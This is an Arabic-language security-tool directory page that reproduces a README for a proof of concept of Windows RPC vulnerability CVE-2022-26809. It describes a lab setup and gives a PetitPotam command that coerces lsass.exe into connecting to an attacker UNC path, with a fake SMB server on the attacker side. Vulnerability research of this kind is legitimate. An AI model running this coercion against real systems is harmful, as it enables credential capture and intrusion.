Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Cve-2022-26809 — إثبات المفهوم للاستغلال CVE-2022-26809، وهي ثغرة تجاوز عدد صحيح في وقت تشغيل RPC في Windows. يتضمن نصوص تشغيل باستخدام أسلوب PetitPotam-style لإكراه مسار UNC ضد lsass.exe وخادم SMB وهمي لاختبار الاستغلال. | Kitploit
أدوات/GitHubGitHub/michealadams30/cve-2022-26809
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقتطوير الحمولاتاستغلال الملفات الثنائية
GitHubmichealadams30/cve-2022-26809

Cve-2022-26809

إثبات المفهوم للاستغلال CVE-2022-26809، وهي ثغرة تجاوز عدد صحيح في وقت تشغيل RPC في Windows. يتضمن نصوص تشغيل باستخدام أسلوب PetitPotam-style لإكراه مسار UNC ضد lsass.exe وخادم SMB وهمي لاختبار الاستغلال.

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Cve-2022-26809

CVE-2022-26809

هذا المستودع هو مجرد بحث بسيط عن الثغرة، للحصول على تحليل أكثر تفصيلاً، يرجى الرجوع هنا.
تحديث: 05/19 2022
لم يتم الانتهاء من هذا التحليل بعد....

تحديث: 05/22 2022
منشور HuanGMz و مدونة corelight تظهر النقطة الضعيفة الحقيقية:

OSF_CASSOCIATION::ProcessBindAckOrNak

يتم تشغيل هذه الثغرة مثل CVE-2021-43893، عند إرسال طلب ESFRPC إلى lsass.exe مع مسار UNC، سيحاول الضحية الوصول إلى الهدف كعميل، وبالتالي سيؤدي إلى تجاوز عدد صحيح في واجهة برمجة تطبيقات العميل

إذا كان لديك أي حل أفضل لتشغيل هذه الثغرة، فلا تتردد في تقديم issue أو pr :)

PoC-CVE-2022-26809

الرجوع هنا

لأن الثغرة تُشغّل مثل CVE-2021-43893، فقط قم باستنساخ كود PetitPotam.

قم فقط بإعداد البيئة كما هنا:

  • المشغل: باستخدام PetitPotam
  • الضحية: مع rpcrt4.dll الضعيفة
  • المهاجم: مع خادم المهاجم
  1. قم بتشغيل fake_smb_server.py على خادم المهاجم بعد استبدال rpcrt.py بالملف الأصلي(**لأن المنفذ 445 مشغول من قبل النظام على Windows، يُوصى بنشر الخدمة على لينكس **
  2. قم بتشغيل الضحية للوصول إلى خادم المهاجم باستخدام:
root@kitploit:~
python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:[email protected]" "\\attacker.path\realfile
  1. لن يسبب ذلك عادةً شاشة الموت الزرقاء (BSOD)، قم بتمكين page heap لـ lsass.exe(على الرغم من أنني لم أنجح في تشغيل BSoD، ولكن وفقًا لـ windbg، تم تشغيل تجاوز العدد الصحيح)

الوصف القديم
هذا هو كود إعادة الإنتاج لثغرة RPC في Windows CVE-2022-26809، وهو يشير إلى https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/netds/rpc/hello.

PoC-OSF_SCALL::GetCoalescedBuffer

إصدار Python الخاص بي هو 3.6.7 لست متأكدًا مما إذا كان GetCoalescedBuffer سيتضمن الثغرة الحقيقية CVE-2022-26809، فقط احتفظ به poc.py فقط يحاول تشغيل الوظيفة الضعيفة OSF_SCALL::GetCoalescedBuffer، وهي لن تسبب أي تعطل لأن تجاوز عدد صحيح dword صعب جدًا إعادة إنتاجه. و rpcrt.py هو حزمة Python impacket.dcerpc.v5.rpcrt، فقط استبدله بالملف الأصلي لتشغيل الثغرة (تذكر أن تأخذ نسخة احتياطية من الأصل :) أعتقد أن rpcrt.py يحتوي على الكثير من الأخطاء).

إذا لم يعمل، ربما يمكن لـ wireshark المساعدة في تحديد الخلل.

PipeDemo

إذا لزم الأمر، استخدم nmake لإعادة بنائه.

تنزيل الأداة